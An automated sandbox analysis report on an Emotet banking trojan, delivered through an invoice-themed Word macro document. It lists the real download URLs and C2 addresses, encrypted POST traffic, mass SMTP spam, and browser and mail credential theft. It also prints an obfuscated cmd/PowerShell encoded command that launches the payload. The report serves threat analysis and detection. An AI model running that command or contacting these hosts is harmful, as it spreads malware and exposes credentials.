Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:389575
Start time:21:52:21
Joe Sandbox Product:Cloud
Start date:17.10.2017
Overall analysis duration:0h 14m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:urldownload.jbs
Sample URL:austinfilmschool.org/Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:21
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
  • JavaScript Instrumentation enabled
Detection:MAL
Classification:mal100.evad.spre.phis.spyw.troj.win@28/12@66/47
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
Warnings:
Show All
  • Exclude process from analysis (whitelisted): conhost.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample is no longer working
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


Spam, unwanted Advertisements and Ransom Demands:

barindex
Send many emails (e-Mail Spam)Show sources
Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 17

E-Banking Fraud:

barindex
Emotet Banking Trojan foundShow sources
Source: unknownProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: unknownProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: C:\Windows\System32\helphome.exeProcess created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/ HTTP/1.0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Host: austinfilmschool.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /nwbBJRnf/ HTTP/1.1Host: zlc-aa.orgConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: austinfilmschool.org
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.196.73.150:443Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: 23 26 83 00 fd 7e f3 5a e7 77 74 e7 92 19 0a 44 14 b3 5e bf 9a b8 0f a8 71 5f 02 bd 78 63 62 c0 38 96 8e 02 2b 17 ea cb 53 89 3c 23 d7 ec 91 9a 97 14 59 eb 1e 5c d9 93 6e f1 fc 4d b3 36 6f 58 6c e1 ad 52 1d f0 15 7a 8a f5 a2 b4 46 d7 2c 8a 04 05 07 6a f6 68 85 ff e4 90 e8 ce 7c 0e 3b 0c 3f f7 ac 28 1b 78 c8 2a 6d f2 b5 32 d8 9a d0 5e 3a 58 9c 1a 45 ba 23 b2 e2 05 ef 9c 76 c2 92 c9 33 92 b3 47 cc 44 08 5a c3 a2 3a 26 50 a4 f7 a1 ab e7 03 3a 36 2f 6f 8a 95 b4 50 0e d1 af 9c 3c 22 da 28 f1 f5 9a f3 ae d8 64 99 e0 29 92 81 38 0c 21 02 8f 80 e3 ff 5d f4 ed 1e b0 ab e5 62 fd 5b 18 94 a4 15 8c e3 f6 d9 5c 80 a9 96 8e 35 58 bd e0 95 42 a6 ab b3 91 93 40 ac 8e a6 23 06 21 1d 6e a1 a8 43 42 37 26 fd d1 5c 1b e9 06 4f 21
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 17 Oct 2017 19:54:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 60868Connection: keep-aliveData Raw: 3b c1 24 4a ab 01 67 69 96 04 db 98 58 ae d2 75 4c 64 5c d7 4a ab b2 d5 ea c7 22 8f 4d 8a 91 c6 10 84 ba c2 97 c2 f4 0e 34 d8 2c bb 74 33 dc 72 f8 d8 d1 bb 96 4e fa 2f ce 21 f2 9e 3f 94 01 f3 66 88 db d6 c3 bb b9 e1 01 f0 ec 36 02 eb 7b ba a8 3f 29 e6 f2 25 5a 01 81 cf 57 fa cd 90 07 56 f9 b4 bb e0 96 58 26 aa 67 f1 9c 38 df 8d 38 68 60 e5 d4 d2 a9 e3 f7 98 9b 77 0f e2 78 d6 57 b2 ec 26 08 e6 c5 cb 51 ee c4 ac 55 85 95 08 16 78 88 6a c2 8a dc 7c 4c 58 18 47 5d 5d 49 09 d8 14 52 46 4d 96 87 cd 00 3a f2 98 eb 87 1f 15 c0 c9 6a 7c d6 d8 ae fa 9a f9 01 6c d3 f9 c7 f3 b4 d3 87 3f 09 77 b7 3e 20 dc eb ac 1a 50 22 c7 39 3b fc c2 53 55 06 5e 21 1c 3d 88 cd bd 58 fe e7 88 64 ab 87 8f d5 07 d3 40 b6 77 3c e0 17 86 57 24 93 bf a4 22 ce 3d fa 63 b1 32 32 d8 46 cd 02 45 e1 20 29 e0 98 ec 76 f3 74 71 fc bd 09 91 15 31 ca e5 59 90 fd fe db 0b eb 52 cd f2
Urls found in memory or binary dataShow sources
Source: WINWORD.EXEString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///c:
Source: WINWORD.EXEString found in binary or memory: file:///c:/users/user/desktop/download/client-%209650
Source: WINWORD.EXEString found in binary or memory: http://
Source: wget.exeString found in binary or memory: http://austinfilmschool.org/invoice-dated-17-oct-17-372510608/vr-aofgb/2017/
Source: wget.exeString found in binary or memory: http://austinfilmschool.org/invoice-dated-17-oct-17-372510608/vr-aofgb/2017/8x
Source: WINWORD.EXEString found in binary or memory: http://n
Source: WINWORD.EXEString found in binary or memory: http://ns
Source: WINWORD.EXEString found in binary or memory: http://ns.a
Source: WINWORD.EXEString found in binary or memory: http://ns.~/
Source: WINWORD.EXEString found in binary or memory: http://p
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Connects to many different domainsShow sources
Source: unknownNetwork traffic detected: DNS query count 45
Connects to several IPs in different countriesShow sources
Source: unknownNetwork traffic detected: IP country count 11
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /nwbBJRnf/ HTTP/1.1Host: zlc-aa.orgConnection: Keep-Alive
Uses SMTP (mail sending)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49204 -> 40.101.48.82:587
Source: global trafficTCP traffic: 192.168.1.16:49211 -> 217.119.50.35:587
Source: global trafficTCP traffic: 192.168.1.16:49213 -> 212.77.101.1:587
Source: global trafficTCP traffic: 192.168.1.16:49214 -> 213.186.33.20:587
Source: global trafficTCP traffic: 192.168.1.16:49215 -> 195.78.67.24:587
Source: global trafficTCP traffic: 192.168.1.16:49219 -> 195.4.92.211:587
Source: global trafficTCP traffic: 192.168.1.16:49224 -> 81.169.145.164:587
Source: global trafficTCP traffic: 192.168.1.16:49227 -> 85.13.152.217:587
Source: global trafficTCP traffic: 192.168.1.16:49230 -> 91.198.169.21:587
Source: global trafficTCP traffic: 192.168.1.16:49232 -> 85.13.134.71:587
Source: global trafficTCP traffic: 192.168.1.16:49233 -> 213.186.33.155:587
Source: global trafficTCP traffic: 192.168.1.16:49235 -> 195.250.38.66:587
Source: global trafficTCP traffic: 192.168.1.16:49238 -> 213.90.36.9:587
Source: global trafficTCP traffic: 192.168.1.16:49240 -> 64.29.151.235:587
Source: global trafficTCP traffic: 192.168.1.16:49241 -> 37.9.169.18:587
Source: global trafficTCP traffic: 192.168.1.16:49248 -> 213.145.228.17:587
Source: global trafficTCP traffic: 192.168.1.16:49252 -> 74.125.205.108:587
Source: global trafficTCP traffic: 192.168.1.16:49261 -> 81.19.149.200:587
Source: global trafficTCP traffic: 192.168.1.16:49262 -> 212.33.55.20:587
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: HEAD /Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/ HTTP/1.0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Host: austinfilmschool.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/ HTTP/1.0User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Host: austinfilmschool.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.196.73.150:443Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: 23 26 83 00 fd 7e f3 5a e7 77 74 e7 92 19 0a 44 14 b3 5e bf 9a b8 0f a8 71 5f 02 bd 78 63 62 c0 38 96 8e 02 2b 17 ea cb 53 89 3c 23 d7 ec 91 9a 97 14 59 eb 1e 5c d9 93 6e f1 fc 4d b3 36 6f 58 6c e1 ad 52 1d f0 15 7a 8a f5 a2 b4 46 d7 2c 8a 04 05 07 6a f6 68 85 ff e4 90 e8 ce 7c 0e 3b 0c 3f f7 ac 28 1b 78 c8 2a 6d f2 b5 32 d8 9a d0 5e 3a 58 9c 1a 45 ba 23 b2 e2 05 ef 9c 76 c2 92 c9 33 92 b3 47 cc 44 08 5a c3 a2 3a 26 50 a4 f7 a1 ab e7 03 3a 36 2f 6f 8a 95 b4 50 0e d1 af 9c 3c 22 da 28 f1 f5 9a f3 ae d8 64 99 e0 29 92 81 38 0c 21 02 8f 80 e3 ff 5d f4 ed 1e b0 ab e5 62 fd 5b 18 94 a4 15 8c e3 f6 d9 5c 80 a9 96 8e 35 58 bd e0 95 42 a6 ab b3 91 93 40 ac 8e a6 23 06 21 1d 6e a1 a8 43 42 37 26 fd d1 5c 1b e9 06 4f 21
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.196.73.150:443Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: 70 b5 e8 a1 54 a2 6e 8e 94 c5 a1 23 a5 f6 79 af c8 70 04 51 3f ea 22 fa e5 0c 66 69 fd 7a 99 8b 69 34 47 de 96 e8 9e c7 df 5f 8c e8 01 28 3e 36 5d 8e f5 4a a2 6a 2f 05 91 8f 96 f1 81 82 e1 95 56 8d b8 47 17 8d 18 b3 80 b3 73 f9 4f df 00 bc b4 6b 17 88 9c b1 0e 20 b0 4d f6 48 62 d3 21 20 ed aa b7 7f 01 0a 09 63 ec 30 6a 5e 46 7b 0c c8 2c fd a1 b5 bd 6e b8 36 ea 12 c6 e8 8c a4 da 0d 49 aa c6 f0 f2 fb 49 ef 71 26 07 60 b2 51 92 3b e8 e2 ad b7 97 55 b7 fa 08 a0 f9 c8 aa 1c 5c 78 76 b4 fd f8 85 1d ce 4d b6 a0 a1 e0 6b 91 36 1b 6b 01 82 fb f5 f8 7c 59 26 fa 67 a3 cb 5b 58 1c 17 e4 f1 56 f4 ae ba 60 cc 62 a8 b8 92 4f ed b9 cc 57 8c 9c 56 dc 06 cd 79 2e f2 19 e0 bf df 51 cd 95 09 ed 1e cc 46 9f ca 13 39 70 b1 48 e9 aa
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 93.180.157.92:443Content-Length: 164Connection: Keep-AliveCache-Control: no-cacheData Raw: 0d 14 aa 49 9c a1 77 0e a3 4b 37 7c 36 7f 3a 41 f1 6b 58 a1 21 b5 1e ed 34 70 cc 85 66 e1 99 76 a4 9c d2 72 fa db c2 6b 7b 42 4a 91 79 9d 6c a6 f9 f7 82 23 97 85 08 47 98 43 28 18 9f 6a e1 cd 2d e7 a4 1d d5 ed 0b 98 ea 0f e6 99 5b 70 d5 00 24 13 75 72 08 b9 17 96 62 bc a7 1b 3f 2b 4c 7d 56 8f 3c d5 8f 45 84 19 24 6e 32 cd a0 2f 31 47 17 9a 9c b2 f0 54 10 f8 2f 58 de a5 de 1e 48 2b 7e ce 44 6d ee 82 8b 56 18 90 d5 d2 66 a8 34 41 f4 f2 ce 23 70 32 5b dd 85 0c 2b 40 c3 cf 51 73 9e 89 da 8b Data Ascii: IwK7|6:AkX!4pfvrk{BJyl#GC(j-[p$urb?+L}V<E$n2/1GT/XH+~DmVf4A#p2[+@Qs
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.196.73.150:443Content-Length: 356Connection: Keep-AliveCache-Control: no-cacheData Raw: 4b 2d d6 f1 04 31 52 42 f6 ee 81 3b a0 93 ff c0 ba d0 b7 3c 16 98 bb 28 2e 56 8c 67 22 45 47 dc 71 b4 2e da 98 33 e6 91 4b e8 08 f8 1d c1 aa 28 88 6d 1b f3 9b 59 5f e0 09 e8 90 d2 f5 2a 71 c6 1d e1 5b ad ae 31 0b fc 32 14 ad 19 29 58 5e 41 15 10 de 2f 04 15 ca df 1e 94 c8 d5 07 13 7d e8 69 73 83 e6 d8 d9 7e 0a c7 f0 2c 3c e1 ec 45 ed 8a ca 40 35 87 f4 23 97 ec 81 63 80 4c 10 37 83 72 4e 1a 36 71 db 6e 3c 71 86 40 b1 f1 49 a1 8c b5 93 bb 67 67 f8 db de bb bc 21 04 62 47 99 3d 06 e0 03 01 c8 2c 38 9a f9 8a f7 a9 60 c8 65 cd 74 8e b9 07 1a 2b 07 4d 5b 0e 53 4f 4e 57 69 31 d9 86 71 3c 00 45 58 10 e1 24 fc b7 a5 32 69 ce c9 9b 6f a4 09 02 fd b2 6e c4 56 67 0a 0c 81 45 32 8f ab ae 79 dc 8f 37 0d 56 f9 00 bb 33 28 e5
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 93.180.157.92:443Content-Length: 612Connection: Keep-AliveCache-Control: no-cacheData Raw: 76 63 1d fb 03 17 f9 68 e3 c3 ed 9a de da 6c c8 6b b3 12 0d d5 15 e3 c0 9e a0 db a2 59 13 10 41 32 ca b3 ee e9 4b 47 41 3f e4 fa a7 aa f1 87 bf ae e7 d7 fc b2 e6 4d d6 c3 e5 84 d9 ce 77 91 0f 59 de b4 63 1a 2c d6 9d f5 55 4e e3 45 80 8c 0a ba 4e 97 7c 8d fa 6a 4a 14 49 a7 a8 5f e9 9b e3 03 31 77 75 8b 30 f0 a1 96 1c f0 6c 4a 58 2a c9 19 9e 0a 3a 6e 70 c0 bb 24 5c c0 9c 21 da c1 1a 79 ad ec 83 5f b3 e6 8c 1e 26 93 8a 3e 60 40 c2 e8 76 1e 07 83 45 36 94 3e 54 fc 0e bf 80 eb 94 d4 2d 27 1c 3b 4d e6 a7 9c 7f c1 41 ae 32 36 eb 8d b1 1d ed 9d 86 cc 91 fa 8e 5d 7a 19 35 eb 3e f4 12 b6 f9 44 70 cd 31 95 b6 f5 c3 7a 29 fc 52 ba 68 54 af d0 a2 f8 67 1a 68 30 99 79 3d 8f e6 5d 75 89 fe 49 5c 1a ec 80 a6 d2 cf b5 61 be 9
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.16:49202 -> 173.201.192.101:3535
Source: global trafficTCP traffic: 192.168.1.16:49204 -> 40.101.48.82:587
Source: global trafficTCP traffic: 192.168.1.16:49211 -> 217.119.50.35:587
Source: global trafficTCP traffic: 192.168.1.16:49213 -> 212.77.101.1:587
Source: global trafficTCP traffic: 192.168.1.16:49214 -> 213.186.33.20:587
Source: global trafficTCP traffic: 192.168.1.16:49215 -> 195.78.67.24:587
Source: global trafficTCP traffic: 192.168.1.16:49219 -> 195.4.92.211:587
Source: global trafficTCP traffic: 192.168.1.16:49224 -> 81.169.145.164:587
Source: global trafficTCP traffic: 192.168.1.16:49227 -> 85.13.152.217:587
Source: global trafficTCP traffic: 192.168.1.16:49230 -> 91.198.169.21:587
Source: global trafficTCP traffic: 192.168.1.16:49232 -> 85.13.134.71:587
Source: global trafficTCP traffic: 192.168.1.16:49233 -> 213.186.33.155:587
Source: global trafficTCP traffic: 192.168.1.16:49235 -> 195.250.38.66:587
Source: global trafficTCP traffic: 192.168.1.16:49238 -> 213.90.36.9:587
Source: global trafficTCP traffic: 192.168.1.16:49240 -> 64.29.151.235:587
Source: global trafficTCP traffic: 192.168.1.16:49241 -> 37.9.169.18:587
Source: global trafficTCP traffic: 192.168.1.16:49248 -> 213.145.228.17:587
Source: global trafficTCP traffic: 192.168.1.16:49252 -> 74.125.205.108:587
Source: global trafficTCP traffic: 192.168.1.16:49261 -> 81.19.149.200:587
Source: global trafficTCP traffic: 192.168.1.16:49262 -> 212.33.55.20:587
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2011124 ET MALWARE Suspicious FTP 220 Banner on Local Port (spaced) 173.201.192.101:3535 -> 192.168.1.16:49202

Stealing of Sensitive Information:

barindex
Searches for Windows Mail specific filesShow sources
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\System32\helphome.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cert7.db
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Windows\System32\helphome.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to steal Instant Messenger accounts or passwordsShow sources
Source: C:\Windows\System32\helphome.exeKey opened: HKEY_USERS\Software\Google\Google Talk\Accounts
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\System32\helphome.exeKey opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\helphome.exeKey opened: HKEY_USERS\Identities\{7E3C98C2-A457-4C7B-90BC-6B7522D9BDED}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\helphome.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\helphome.exeKey opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Windows\System32\helphome.exeKey opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Windows\System32\helphome.exeKey opened: HKEY_USERS\Software\Microsoft\Windows Live Mail

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\16994.exe
Source: C:\Windows\System32\helphome.exeFile created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Windows\System32\helphome.exeFile created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exeExecutable created and started: C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\helphome.exeExecutable created and started: C:\Windows\System32\helphome.exe

Data Obfuscation:

barindex
PE file contains sections with non-standard namesShow sources
Source: 16994.exe.7.drStatic PE information: section name: f
Source: LLocMy8gfC0E0xG3.exe.11.drStatic PE information: section name: f
Document contains an embedded VBA with many randomly named variablesShow sources
Source: Client- 9650, Oct 2017 Invoice.doc.0.drStream path 'Macros/VBA/Module1' : High entropy of concatenated variable names
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
